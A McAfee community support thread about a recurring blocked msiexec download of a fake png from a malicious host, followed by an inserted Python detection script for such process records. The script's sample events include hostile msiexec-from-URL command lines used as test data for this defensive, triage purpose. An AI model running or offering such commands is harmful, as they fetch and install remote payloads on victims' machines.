I would like you to see the related image, since for a few days I have had the following log on some machines. ATP blocks it, but nevertheless, no matter how much the analysis is carried out, the behavior persists. I would like to know what may be causing it and how to eliminate it.
Thank you for reaching out to McAfee Community.
From the provided details, it looks like you needed information on the file.
I suggest you raise an SR and provide us with a sample as per the KB below, and we can share analysis on this one.
Hi @antivirusfnc,
Thank you for reaching us on the community!
As per the image attached to the post, I see that cmd.exe is invoked to run an msiexec command to download a file (appears to be a png file as per the screenshot) from a malicious site/IP address.
I suspect that the infected machines must have a malicious file containing the command placed in a start-up location, or it must be running as a task at a specified time interval.
As specified by @yaz, I would request you to open a malware ticket with the support team to check on this.
- Rohit Francis
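
A triage sketch for the behaviour described in the reply above, added here as an example and not part of the thread or of any McAfee tooling: it flags process-creation records where msiexec is handed a remote URL, and notes a cmd.exe launcher and a non-installer file extension. The record field names and the sample events are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Constructed process-creation records (field names are assumptions, modelled
# loosely on Sysmon Event ID 1); none of this data comes from the thread.
SAMPLE_EVENTS = [
    {"host": "PC-01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://198.51.100.7/update.png"},
    {"host": "PC-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Installers\agent.msi" /qn'},
    {"host": "PC-03", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c msiexec /package https://example.invalid/a.msi /quiet"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MSIEXEC_RE = re.compile(r"\bmsiexec(?:\.exe)?\b", re.IGNORECASE)
INSTALLER_EXTS = (".msi", ".msp")

def exe_name(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()

def assess(event):
    """Return a finding dict if msiexec is pointed at a remote URL, else None."""
    cmd = event["cmdline"]
    if not MSIEXEC_RE.search(cmd):
        return None
    urls = URL_RE.findall(cmd)
    if not urls:
        return None  # local package: ordinary software installation
    reasons = ["msiexec given a remote package URL"]
    if "cmd.exe" in (exe_name(event["parent"]), exe_name(event["image"])):
        reasons.append("launched through cmd.exe")
    if any(not urlsplit(u).path.lower().endswith(INSTALLER_EXTS) for u in urls):
        reasons.append("package extension is not .msi/.msp")
    return {"host": event["host"], "urls": urls, "reasons": reasons}

def hunt(events):
    """Assess every record and keep only the ones that produced a finding."""
    return [finding for e in events if (finding := assess(e))]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["urls"], "; ".join(f["reasons"]))
```

The parent image on a flagged record is the lead to follow back to the start-up entry or scheduled task that keeps relaunching the command.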
Hi, and thank you for your collaboration!!
The support case was created (4-22251102041); it was updated by sending the procmon and MER logs from one of the affected machines.
I am waiting for more progress.